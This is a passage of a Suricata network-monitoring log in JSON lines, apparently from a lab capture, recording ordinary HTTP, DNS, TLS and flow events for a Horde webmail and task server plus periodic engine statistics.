{"timestamp":"2020-02-29T00:21:22.602835+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":1}} {"timestamp":"2020-02-29T00:21:22.602932+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":5}} {"timestamp":"2020-02-29T00:21:22.622869+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":8}} {"timestamp":"2020-02-29T00:21:23.000179+0000","event_type":"stats","stats":{"uptime":14935,"capture":{"kernel_packets":137495,"kernel_drops":0},"decoder":{"pkts":137587,"bytes":94288945,"invalid":193,"ipv4":136034,"ipv6":10,"ethernet":137587,"raw":0,"null":0,"sll":0,"tcp":130520,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} {"timestamp":"2020-02-29T00:21:23.001653+0000","flow_id":1056805396477246,"event_type":"flow","src_ip":"192.168.10.81","src_port":52928,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:20:16.980286+0000","end":"2020-02-29T00:20:22.782309+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:27.000286+0000","flow_id":600409286444339,"event_type":"flow","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":28,"bytes_toserver":5065,"bytes_toclient":22432,"start":"2020-02-29T00:20:13.591155+0000","end":"2020-02-29T00:20:26.906913+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:29.000441+0000","flow_id":1047128820218052,"event_type":"flow","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:28.391364+0000","end":"2020-02-29T00:16:28.496615+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:30.000158+0000","event_type":"stats","stats":{"uptime":14942,"capture":{"kernel_packets":137592,"kernel_drops":0},"decoder":{"pkts":137604,"bytes":94290019,"invalid":193,"ipv4":136049,"ipv6":10,"ethernet":137604,"raw":0,"null":0,"sll":0,"tcp":130535,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:31.925724+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45535,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:32.193317+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394}} {"timestamp":"2020-02-29T00:21:33.000202+0000","flow_id":291687022764127,"event_type":"flow","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.237663+0000","end":"2020-02-29T00:16:32.345816+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:33.000372+0000","flow_id":1852138835688518,"event_type":"flow","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.015430+0000","end":"2020-02-29T00:16:32.120707+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:36.986166+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36206,"tx_id":0}} {"timestamp":"2020-02-29T00:21:36.998071+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16560,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:37.000143+0000","event_type":"stats","stats":{"uptime":14949,"capture":{"kernel_packets":137612,"kernel_drops":0},"decoder":{"pkts":137625,"bytes":94299770,"invalid":193,"ipv4":136070,"ipv6":10,"ethernet":137625,"raw":0,"null":0,"sll":0,"tcp":130554,"udp":5308,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2429,"failed_udp":114},"tx":{"http":4830,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2511}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2485,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19767,"memcap_state":0,"memcap_global":0},"http":{"memuse":70212,"memcap":0}}} {"timestamp":"2020-02-29T00:21:37.000381+0000","flow_id":996559891170365,"event_type":"flow","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6318,"start":"2020-02-29T00:20:31.623677+0000","end":"2020-02-29T00:20:36.894135+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:37.153346+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344}} {"timestamp":"2020-02-29T00:21:38.000477+0000","flow_id":726707095974901,"event_type":"flow","src_ip":"192.168.10.130","src_port":34894,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":912,"start":"2020-02-29T00:20:31.832501+0000","end":"2020-02-29T00:20:37.027337+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:39.000350+0000","flow_id":2129426219671760,"event_type":"flow","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:38.401616+0000","end":"2020-02-29T00:16:38.507038+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:42.154621+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8575,"tx_id":1}} {"timestamp":"2020-02-29T00:21:44.000206+0000","event_type":"stats","stats":{"uptime":14956,"capture":{"kernel_packets":137630,"kernel_drops":0},"decoder":{"pkts":137636,"bytes":94304976,"invalid":193,"ipv4":136081,"ipv6":10,"ethernet":137636,"raw":0,"null":0,"sll":0,"tcp":130563,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2827,"new_pruned":17,"est_pruned":2486,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19508,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} {"timestamp":"2020-02-29T00:21:44.207478+0000","flow_id":2145609676489439,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:21:45.000312+0000","flow_id":446177012569860,"event_type":"flow","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1459,"bytes_toclient":6323,"start":"2020-02-29T00:20:39.153348+0000","end":"2020-02-29T00:20:44.442845+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:45.000639+0000","flow_id":1224712834032352,"event_type":"flow","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.041696+0000","end":"2020-02-29T00:16:44.146676+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:45.000742+0000","flow_id":1932166962086260,"event_type":"flow","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.262516+0000","end":"2020-02-29T00:16:44.370968+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:47.000606+0000","flow_id":1207103483610682,"event_type":"flow","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":8456,"start":"2020-02-29T00:20:41.460346+0000","end":"2020-02-29T00:20:46.736491+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:48.000454+0000","flow_id":1731686478885927,"event_type":"flow","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:47.177191+0000","end":"2020-02-29T00:16:47.282104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:50.000632+0000","flow_id":1781907531591448,"event_type":"flow","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:49.880408+0000","end":"2020-02-29T00:16:49.985303+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.000375+0000","event_type":"stats","stats":{"uptime":14963,"capture":{"kernel_packets":138419,"kernel_drops":0},"decoder":{"pkts":138443,"bytes":94943524,"invalid":193,"ipv4":136886,"ipv6":10,"ethernet":138443,"raw":0,"null":0,"sll":0,"tcp":131368,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2853,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2869,"synack":2860,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2829,"new_pruned":17,"est_pruned":2489,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} {"timestamp":"2020-02-29T00:21:51.003841+0000","flow_id":1807681630395421,"event_type":"flow","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:50.089117+0000","end":"2020-02-29T00:16:50.197597+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.889868+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9266,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:52.125095+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987}} {"timestamp":"2020-02-29T00:21:52.169203+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":37371,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.174073+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:52.172534+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} 